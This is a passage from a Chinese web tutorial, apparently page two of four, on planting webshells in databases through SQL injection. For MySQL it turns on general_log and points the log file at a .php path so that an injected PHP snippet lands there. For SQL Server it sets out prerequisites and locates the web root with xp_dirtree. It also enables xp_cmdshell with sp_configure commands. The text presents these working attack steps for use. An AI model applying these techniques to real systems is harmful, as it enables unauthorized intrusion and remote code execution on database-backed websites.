侵權投訴
訂閱
糾錯
加入自媒體

三大數(shù)據庫如何寫入WebShell?

將log日志開啟,并設置日志的寫入位置:

Set globalgeneral_log = on;

Set globalgeneral_log_file = ‘F:/test.php’;

image.png

圖7:設置日志寫入位置

(2)使用寫入日志再讀取的方法

直接在SQL注入點,使用查詢語句,添加WebShell代碼,如下:

Select '<?phpphpinfo();?>';

此時這段WebShell代碼已經被記錄到日志文件中了,接下就可以使用連接工具進行連接了。

image.png

圖8:使用寫入日志再讀取的方法

SqlServer寫入WebShell

01必備條件

① 有相應的權限db_owner

② 獲得Web目錄的絕對路徑

02寫入方法

向MSSQL寫入WebShell的方法一共有種:利用xp_cmdshell命令、差異備份寫入shell、log備份寫入shell。

03使用XP_cmdshell寫入Webshell

(1)實驗前準備:

首先我們需要查找網站目錄的絕對路徑,查找絕對路徑的方法有5種:

通過報錯信息查找;

通過目錄爆破猜解;

通過旁站的目錄確定;

通過存儲過程來搜索;

通過讀取配置文件查找。

其中通過存儲過程來搜索,SQLServer提供了兩種方法:xp_cmdshell和xp_dirtree

execute master..xp_dirtree ‘c:’; 可以查出所有c:下的文件、目錄、子目錄。

image.png

圖9:查找網站目錄的絕對路徑

在真實環(huán)境中時,我們執(zhí)行execute可能并不能得到回顯信息,但我們可以在注入點處新建一張表,然后將xp_dirtree查詢到的信息插入其中,再查詢這張表即可得相應的絕對路徑了。

Xp_cmdshell是一個更為有效的查詢絕對路徑的函數(shù),但是目前已經被SQLServer默認關閉了,但我們可以使用如下命令啟用這個選項。

EXEC sp_configure 'show advanced options',1;//允許修改高級參數(shù)RECONFIGURE;

EXEC sp_configure 'xp_cmdshell',1; //打開xp_cmdshell擴展RECONFIGURE;--

image.png

圖10:打開xp_cmdshell擴展

<上一頁  1  2  3  4  下一頁>  
聲明: 本文由入駐維科號的作者撰寫,觀點僅代表作者本人,不代表OFweek立場。如有侵權或其他問題,請聯(lián)系舉報。

發(fā)表評論

0條評論,0人參與

請輸入評論內容...

請輸入評論/評論長度6~500個字

您提交的評論過于頻繁,請輸入驗證碼繼續(xù)

暫無評論

暫無評論

    安防 獵頭職位 更多
    文章糾錯
    x
    *文字標題:
    *糾錯內容:
    聯(lián)系郵箱:
    *驗 證 碼:

    粵公網安備 44030502002758號